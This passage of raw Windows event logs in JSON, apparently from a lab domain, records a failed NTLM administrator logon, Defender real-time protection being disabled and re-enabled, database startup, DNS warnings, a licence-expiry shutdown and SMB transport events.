55s1kn0EdE=</Value></TokenEntry><TokenEntry><Name>otherInfoPublic.secureStoreId</Name><Value>EWYgPA6OrzEgVvpKCJWCKOhwo1pTUXgNrdA0B0oEMDvUvsmkZagti6n7JDPedqCs</Value></TokenEntry><TokenEntry><Name>otherInfoPrivate.secureStoreId</Name><Value>EWYgPA6OrzEgVvpKCJWCKOhwo1pTUXgNrdA0B0oEMDvUvsmkZagti6n7JDPedqCs</Value></TokenEntry></Values></Claims></RequestSecurityToken></soap:Body></soap:Envelope>)\n00010002(0x80072F8F, 13:08:52:869 - <NULL>)\n00010003(0x80072F8F, 13:08:52:869)\n","EventReceivedTime":"2021-09-21T13:08:53.425670+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:28:43.986770+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4625,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12544,"OpcodeValue":0,"RecordNumber":878127,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":5852,"Channel":"Security","Message":"An account failed to log on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nAccount For Which Logon Failed:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\tadministrator\r\n\tAccount Domain:\t\t\r\n\r\nFailure Information:\r\n\tFailure Reason:\t\tUnknown user name or bad password.\r\n\tStatus:\t\t\t0xC000006D\r\n\tSub Status:\t\t0xC000006A\r\n\r\nProcess Information:\r\n\tCaller Process ID:\t0x0\r\n\tCaller Process Name:\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t192.168.4.204\r\n\tSource Network Address:\t172.16.20.11\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tNtLmSsp \r\n\tAuthentication Package:\tNTLM\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\r\n\r\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe Process Information fields indicate which account and process on the system requested the logon.\r\n\r\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-0-0","TargetUserName":"administrator","Status":"0xc000006d","FailureReason":"%%2313","SubStatus":"0xc000006a","LogonType":"3","LogonProcessName":"NtLmSsp ","AuthenticationPackageName":"NTLM","WorkstationName":"192.168.4.204","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessId":"0x0","ProcessName":"-","IpAddress":"172.16.20.11","IpPort":"0","EventReceivedTime":"2021-09-21T13:28:45.915228+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T14:30:51.004190+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":6416,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":13316,"OpcodeValue":0,"RecordNumber":878583,"ExecutionProcessID":4,"ExecutionThreadID":360,"Channel":"Security","Message":"A new external device was recognized by the system.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tACC01$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nDevice ID:\tDISPLAY\\Default_Monitor\\1&1f0c3c2f&0&UID256\r\n\r\nDevice Name:\tGeneric Non-PnP Monitor\r\n\r\nClass ID:\t\t{4d36e96e-e325-11ce-bfc1-08002be10318}\r\n\r\nClass Name:\tMonitor\r\n\r\nVendor IDs:\t\r\n\t\tMONITOR\\Default_Monitor\r\n\t\t\r\n\t\t\r\n\r\nCompatible IDs:\t\r\n\t\t*PNP09FF\r\n\t\t\r\n\t\t\r\n\r\nLocation Information:\t-","Category":"Plug and Play Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"ACC01$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","DeviceId":"DISPLAY\\Default_Monitor\\1&1f0c3c2f&0&UID256","DeviceDescription":"Generic Non-PnP Monitor","ClassId":"{4d36e96e-e325-11ce-bfc1-08002be10318}","ClassName":"Monitor","VendorIds":"\n\t\tMONITOR\\Default_Monitor\n\t\t\n\t\t","CompatibleIds":"\n\t\t*PNP09FF\n\t\t\n\t\t","LocationInformation":"-","EventReceivedTime":"2021-09-21T14:30:52.633134+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T15:18:33.163569+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9259400833873739776","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":10010,"SourceName":"Microsoft-Windows-DistributedCOM","ProviderGuid":"{1B562E86-B7AA-4131-BADC-B6F3A001407E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56207,"ActivityID":"{5E3B3BE3-DA4F-4745-878E-5A31A610E9E3}","ExecutionProcessID":904,"ExecutionThreadID":2928,"Channel":"System","Domain":"ACC01","AccountName":"sa-lab-win10-02","UserID":"S-1-5-21-2550961474-1995063089-462850883-1001","AccountType":"User","Message":"The server Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca did not register with DCOM within the required timeout.","Opcode":"Info","param1":"Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca","EventReceivedTime":"2021-09-21T15:18:34.476677+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:02.374592+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":102,"SourceName":"ESENT","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":153859,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,P,98) DS_Token_DB: The database engine (10.00.19042.0000) is starting a new instance (0).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"920,P,98","Data_2":"DS_Token_DB: ","Data_3":"0","Data_4":"10","Data_5":"00","Data_6":"19042","Data_7":"0000","EventReceivedTime":"2021-09-21T13:19:02.640216+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.421424+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":326,"SourceName":"ESENT","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":153864,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,D,50) DS_Token_DB: The database engine attached a database (1, C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSTokenDB2.dat). (Time=0 seconds) \r\n \r\nSaved Cache: 1 0 \r\nAdditional Data: lgposAttach = 00000004:000B:0268,\ndbv = 1568.110.240 \r\n \r\nInternal Timing Sequence: \n[1] 0.000003 +J(0)\n[2] 0.000978 -0.000189 (1) WT +J(0) +M(C:0K, Fs:17, WS:4K # 0K, PF:4K # 0K, P:4K)\n[3] 0.006950 -0.001059 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:7, WS:24K # 0K, PF:20K # 0K, P:20K)\n[4] 0.000626 +J(0)\n[5] -\n[6] -\n[7] -\n[8] 0.000490 -0.000323 (2) CM -0.000225 (2) WT +J(CM:2, PgRf:2, Rd:4/2, Dy:0/0, Lg:54/1) +M(C:8K, Fs:4, WS:16K # 0K, PF:28K # 0K, P:28K)\n[9] 0.005721 -0.005436 (3) CM -0.005297 (3) WT +J(CM:3, PgRf:23, Rd:0/3, Dy:0/0, Lg:0/0) +M(C:0K, Fs:24, WS:88K # 0K, PF:196K # 0K, P:196K)\n[10] 0.000507 -0.000377 (2) CM -0.000285 (2) WT +J(CM:2, PgRf:40, Rd:0/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:2, WS:8K # 0K, PF:64K # 0K, P:64K)\n[11] 0.000170 -0.000138 (1) CM -0.000095 (1) WT +J(CM:1, PgRf:1, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K)\n[12] 0.004223 -0.004147 (1) CM -0.004105 (1) WT +J(CM:1, PgRf:42, Rd:0/1, Dy:0/0, Lg:0/0)\n[13] 0.000002 +J(0)\n[14] 0.0 +J(0)\n[15] 0.000201 -0.000174 (1) CM -0.000127 (1) WT +J(CM:1, PgRf:1, Rd:0/1, Dy:0/0, Lg:0/0).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"920,D,50","Data_2":"DS_Token_DB: ","Data_3":"1","Data_4":"C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSTokenDB2.dat","Data_5":"0","Data_6":"\n[1] 0.000003 +J(0)\n[2] 0.000978 -0.000189 (1) WT +J(0) +M(C:0K, Fs:17, WS:4K # 0K, PF:4K # 0K, P:4K)\n[3] 0.006950 -0.001059 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:7, WS:24K # 0K, PF:20K # 0K, P:20K)\n[4] 0.000626 +J(0)\n[5] -\n[6] -\n[7] -\n[8] 0.000490 -0.000323 (2) CM -0.000225 (2) WT +J(CM:2, PgRf:2, Rd:4/2, Dy:0/0, Lg:54/1) +M(C:8K, Fs:4, WS:16K # 0K, PF:28K # 0K, P:28K)\n[9] 0.005721 -0.005436 (3) CM -0.005297 (3) WT +J(CM:3, PgRf:23, Rd:0/3, Dy:0/0, Lg:0/0) +M(C:0K, Fs:24, WS:88K # 0K, PF:196K # 0K, P:196K)\n[10] 0.000507 -0.000377 (2) CM -0.000285 (2) WT +J(CM:2, PgRf:40, Rd:0/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:2, WS:8K # 0K, PF:64K # 0K, P:64K)\n[11] 0.000170 -0.000138 (1) CM -0.000095 (1) WT +J(CM:1, PgRf:1, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K)\n[12] 0.004223 -0.004147 (1) CM -0.004105 (1) WT +J(CM:1, PgRf:42, Rd:0/1, Dy:0/0, Lg:0/0)\n[13] 0.000002 +J(0)\n[14] 0.0 +J(0)\n[15] 0.000201 -0.000174 (1) CM -0.000127 (1) WT +J(CM:1, PgRf:1, Rd:0/1, Dy:0/0, Lg:0/0).","Data_7":"1 0","Data_8":"lgposAttach = 00000004:000B:0268,\ndbv = 1568.110.240","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.374549+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":105,"SourceName":"ESENT","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":153863,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,D,0) DS_Token_DB: The database engine started a new instance (0). (Time=1 seconds) \r\n \r\nAdditional Data:\r\n lgposV2[] = 00000004:0001:0000 - 00000004:0008:0367 - 00000004:0009:0000 - 00000004:0009:0000 (00000000:0000:0000)\ncReInits = 3\n \r\n \r\nInternal Timing Sequence: \n[1] 0.003158 +J(0) +M(C:0K, Fs:166, WS:652K # 0K, PF:3156K # 0K, P:3156K)\n[2] 0.000378 +J(0) +M(C:8K, Fs:96, WS:376K # 0K, PF:292K # 0K, P:292K)\n[3] 0.000018 +J(0) +M(C:0K, Fs:4, WS:16K # 0K, PF:64K # 0K, P:64K)\n[4] 0.000116 +J(0) +M(C:0K, Fs:20, WS:76K # 0K, PF:140K # 0K, P:140K)\n[5] 0.001763 +J(0) +M(C:0K, Fs:7, WS:28K # 0K, PF:16K # 0K, P:16K)\n[6] 0.750574 +J(0) +M(C:0K, Fs:19, WS:72K # 0K, PF:16K # 0K, P:16K)\n[7] 0.026396 -0.021788 (2) WT +J(0) +M(C:0K, Fs:31, WS:124K # 0K, PF:64K # 0K, P:64K)\n[8] 0.115229 -0.062606 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:32448/22) +M(C:0K, Fs:455, WS:1276K # 0K, PF:1764K # 0K, P:1764K)\n[9] 0.000685 +J(0) +M(C:0K, Fs:5, WS:20K # 0K, PF:0K # 0K, P:0K)\n[10] 0.002198 -0.001414 (1) WT +J(0) +M(C:0K, Fs:0, WS:-60K # 0K, PF:-60K # 0K, P:-60K)\n[11] 0.000028 +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:49/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K)\n[12] 0.006304 -0.002930 (1) WT +J(0) +M(C:0K, Fs:11, WS:4K # 0K, PF:0K # 0K, P:0K)\n[13] 0.088666 -0.001456 (2) CM -0.043395 (23) WT +J(CM:2, PgRf:2, Rd:0/2, Dy:0/0, Lg:8759/5) +M(C:0K, Fs:53, WS:-712K # 0K, PF:-1304K # 0K, P:-1304K)\n[14] 0.000018 +J(0)\n[15] 0.000015 +J(0)\n[16] 0.011155 -0.010452 (1) WT +J(0) +M(C:0K, Fs:2, WS:0K # 0K, PF:0K # 0K, P:0K).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"920,D,0","Data_2":"DS_Token_DB: ","Data_3":"0","Data_4":"1","Data_5":"\n[1] 0.003158 +J(0) +M(C:0K, Fs:166, WS:652K # 0K, PF:3156K # 0K, P:3156K)\n[2] 0.000378 +J(0) +M(C:8K, Fs:96, WS:376K # 0K, PF:292K # 0K, P:292K)\n[3] 0.000018 +J(0) +M(C:0K, Fs:4, WS:16K # 0K, PF:64K # 0K, P:64K)\n[4] 0.000116 +J(0) +M(C:0K, Fs:20, WS:76K # 0K, PF:140K # 0K, P:140K)\n[5] 0.001763 +J(0) +M(C:0K, Fs:7, WS:28K # 0K, PF:16K # 0K, P:16K)\n[6] 0.750574 +J(0) +M(C:0K, Fs:19, WS:72K # 0K, PF:16K # 0K, P:16K)\n[7] 0.026396 -0.021788 (2) WT +J(0) +M(C:0K, Fs:31, WS:124K # 0K, PF:64K # 0K, P:64K)\n[8] 0.115229 -0.062606 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:32448/22) +M(C:0K, Fs:455, WS:1276K # 0K, PF:1764K # 0K, P:1764K)\n[9] 0.000685 +J(0) +M(C:0K, Fs:5, WS:20K # 0K, PF:0K # 0K, P:0K)\n[10] 0.002198 -0.001414 (1) WT +J(0) +M(C:0K, Fs:0, WS:-60K # 0K, PF:-60K # 0K, P:-60K)\n[11] 0.000028 +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:49/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K)\n[12] 0.006304 -0.002930 (1) WT +J(0) +M(C:0K, Fs:11, WS:4K # 0K, PF:0K # 0K, P:0K)\n[13] 0.088666 -0.001456 (2) CM -0.043395 (23) WT +J(CM:2, PgRf:2, Rd:0/2, Dy:0/0, Lg:8759/5) +M(C:0K, Fs:53, WS:-712K # 0K, PF:-1304K # 0K, P:-1304K)\n[14] 0.000018 +J(0)\n[15] 0.000015 +J(0)\n[16] 0.011155 -0.010452 (1) WT +J(0) +M(C:0K, Fs:2, WS:0K # 0K, PF:0K # 0K, P:0K).","Data_6":"lgposV2[] = 00000004:0001:0000 - 00000004:0008:0367 - 00000004:0009:0000 - 00000004:0009:0000 (00000000:0000:0000)\ncReInits = 3\n","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:12:01.110720+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":5781,"SourceName":"NETLOGON","TaskValue":0,"RecordNumber":170129,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Dynamic registration or deletion of one or more DNS records associated with DNS domain 'DomainDnsZones.prod.corp.local.' failed.  These records are used by other computers to locate this server as a domain controller (if the specified domain is an Active Directory domain) or as an LDAP server (if the specified domain is an application partition).  \r\n\r\nPossible causes of failure include:  \r\n- TCP/IP properties of the network connections of this computer contain wrong IP address(es) of the preferred and alternate DNS servers \r\n- Specified preferred and alternate DNS servers are not running \r\n- DNS server(s) primary for the records to be registered is not running \r\n- Preferred or alternate DNS servers are configured with wrong root hints \r\n- Parent DNS zone contains incorrect delegation to the child zone authoritative for the DNS records that failed registration  \r\n\r\nUSER ACTION  \r\nFix possible misconfiguration(s) specified above and initiate registration or deletion of the DNS records by running 'nltest.exe /dsregdns' from the command prompt on the domain controller or by restarting Net Logon service on the domain controller.","Opcode":"Info","Data":"DomainDnsZones.prod.corp.local.","EventData.Binary":"2A230000","EventReceivedTime":"2021-09-21T13:12:01.986360+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:11:16.621836+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5001,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11262,"ExecutionProcessID":2484,"ExecutionThreadID":3816,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Real-time Protection scanning for malware and other potentially unwanted software was disabled.","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2011.6","EventReceivedTime":"2021-09-21T13:11:17.499619+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:13:01.202133+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5000,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11264,"ExecutionProcessID":2484,"ExecutionThreadID":3816,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Real-time Protection scanning for malware and other potentially unwanted software was enabled.","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2011.6","EventReceivedTime":"2021-09-21T13:13:01.515192+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.187093+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":300,"SourceName":"ESENT","Version":0,"TaskValue":3,"OpcodeValue":0,"RecordNumber":153860,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,R,98) DS_Token_DB: The database engine is initiating recovery steps.","Category":"Logging/Recovery","Opcode":"Info","Data":"svchost","Data_1":"920,R,98","Data_2":"DS_Token_DB: ","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.265413+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":301,"SourceName":"ESENT","Version":0,"TaskValue":3,"OpcodeValue":0,"RecordNumber":153861,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,R,98) DS_Token_DB: The database engine has finished replaying logfile C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSS.log. \r\n \r\nProcessing Stats: \n[1] 0.076911 -0.032624 (9) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:32448/22) +M(C:0K, Fs:425, WS:1164K # 0K, PF:1692K # 0K, P:1692K). \r\nLog record of type 'AttachDB ' was seen most frequently (3 times)","Category":"Logging/Recovery","Opcode":"Info","Data":"svchost","Data_1":"920,R,98","Data_2":"DS_Token_DB: ","Data_3":"C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSS.log","Data_4":"\n[1] 0.076911 -0.032624 (9) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:32448/22) +M(C:0K, Fs:425, WS:1164K # 0K, PF:1692K # 0K, P:1692K).","Data_5":"AttachDB ","Data_6":"3","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.358924+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":302,"SourceName":"ESENT","Version":0,"TaskValue":3,"OpcodeValue":0,"RecordNumber":153862,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,U,98) DS_Token_DB: The database engine has successfully completed recovery steps.","Category":"Logging/Recovery","Opcode":"Info","Data":"svchost","Data_1":"920,U,98","Data_2":"DS_Token_DB: ","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T20:52:58.277519+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":138,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":108983,"ExecutionProcessID":912,"ExecutionThreadID":1292,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"NtpClient succeeds in resolving domain peer DC01.corp.local after a previous failure.","Opcode":"Info","DomainPeer":"DC01.corp.local","EventReceivedTime":"2021-09-21T20:52:59.495977+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T15:30:53.665748+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":26,"SourceName":"Application Popup","ProviderGuid":"{47BFA2B7-BD54-4FAC-B70B-29021084CA8F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56208,"ExecutionProcessID":4284,"ExecutionThreadID":3292,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Session has been idle over its time limit.\nIt will be disconnected in 2 minutes.\nPress any key now to continue session.","Opcode":"Info","Caption":"Idle timer expired","EventReceivedTime":"2021-09-21T15:30:54.982343+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T14:03:44.090392+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1074,"SourceName":"User32","ProviderGuid":"{B0AA8734-56F7-41CC-B2F4-DE228E98B946}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170180,"ExecutionProcessID":384,"ExecutionThreadID":400,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The process C:\\Windows\\system32\\wlms\\wlms.exe (DC02) has initiated the shutdown of computer DC02 on behalf of user NT AUTHORITY\\SYSTEM for the following reason: Other (Planned)\r\n Reason Code: 0x80000000\r\n Shutdown Type: shutdown\r\n Comment: The license period for this installation of Windows has expired. The operating system is shutting down.\r\n","param1":"C:\\Windows\\system32\\wlms\\wlms.exe (DC02)","param2":"DC02","param3":"Other (Planned)","param4":"0x80000000","param5":"shutdown","param6":"The license period for this installation of Windows has expired. The operating system is shutting down.\n","param7":"NT AUTHORITY\\SYSTEM","EventReceivedTime":"2021-09-21T14:03:45.528530+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T14:03:44.107938+05:45","Hostname":"DC02.prod.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":54,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":728,"ExecutionProcessID":940,"ExecutionThreadID":3116,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Local multi-user session manager received system shutdown message","Opcode":"Info","EventReceivedTime":"2021-09-21T14:03:45.566031+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:15:51.920580+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":30812,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1288,"ExecutionProcessID":4,"ExecutionThreadID":88,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Added a TDI transport interface.\r\n\r\nName: \\Device\\NetBT_Tcpip_{48B8E372-14A4-40C0-9732-C046D6CCC5CD}\r\n\r\nGuidance:\r\nA TDI (NetBIOS) binding was added to the specified network adapter for the SMB client. The SMB client can now send and receive SMB traffic on this network adapter using TDI. You should expect this event when a computer restarts or when a previously disabled network adaptor is re-enabled. No user action is required.","Opcode":"Info","ServerNameLength":"58","ServerName":"\\Device\\NetBT_Tcpip_{48B8E372-14A4-40C0-9732-C046D6CCC5CD}","EventReceivedTime":"2021-09-21T14:21:57.965254+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:15:01.998735+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775812","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":508,"SourceName":"Microsoft-Windows-Kernel-Power","ProviderGuid":"{331C3B3A-2005-44C2-AC5E-77220C37D6B4}","Version":0,"TaskValue":159,"OpcodeValue":0,"RecordNumber":645163,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Message":"The system has been constrained to a periodic tick \r\n\r\nReason: No HW support.","Opcode":"Info","Reason":"2","EventReceivedTime":"2021-09-21T12:17:04.673707+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:19.889322+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":30810,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1289,"ExecutionProcessID":4,"ExecutionThreadID":252,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Added a TCP/IP transport interface.\r\n\r\nName: \\DEVICE\\TCPIP6_{93214454-281b-4dbb-bf1a-2b7b93a412ab}\r\nInterfaceIndex: 0xC\r\n\r\nGuidance:\r\nA TCP/IP binding was added to the specified network adapter for the SMB client. The SMB client can now send and receive SMB traffic on this network adapter using TCP/IP. You should expect this event when a computer restarts or when a previously disabled network adaptor is re-enabled. No user action is 